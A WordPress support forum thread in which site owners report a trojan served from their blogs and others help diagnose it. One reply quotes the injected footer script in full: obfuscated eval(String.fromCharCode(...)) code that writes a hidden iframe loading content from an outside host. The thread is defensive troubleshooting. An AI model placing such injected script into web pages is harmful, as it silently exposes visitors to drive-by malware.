Posted 3 years ago #
Hi
I am having problems with my site: http://www.boidus.co.uk/
I have been receiving reports from users about a virus/trojan from my site infecting their systems. I am not sure how this can be since I upgraded to WP 2.7.1
Is there a way I can scan my files for viruses and remove the weak link to my site?
Please take a look here (be careful)
http://www.boidus.co.uk/
and HELP.
I don't want to upset my readers more.
Thanks
Killion
Posted 3 years ago #
Hi Killion,
any resolution to the problem?
I found a line of code at the bottom of index.php which generates an iframe and it's from there that the trojan is being served. I deleted the code but it was back a few days later.
C.
Being a mac user, I death-defyingly clicked on your link and ignored the security warning I got from safari.
Yes, you have some weird bit of javascript in your footer
<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,102,103,103,103,101,51,61,34,118,101,115,34,59,118,97,114,32,119,51,52,53,61,34,116,101,34,59,118,97,114,32,114,101,54,61,34,108,105,97,46,34,59,118,97,114,32,114,114,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,102,103,103,103,101,51,43,39,39,43,119,51,52,53,43,39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,113,112,47,39,43,39,39,43,39,39,43,39,34,32,115,116,121,108,101,61,34,100,39,43,39,105,115,112,108,97,121,58,110,39,43,39,111,110,101,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,116,61,48,48,48,48,49,50,49,55))</script>
Check your footer.php. It's even after the closing html tag.
Posted 3 years ago #
I got the same problem... can't seem to find a fix for it...
It infects all my wordpress blogs....
This topic has been closed to new replies.
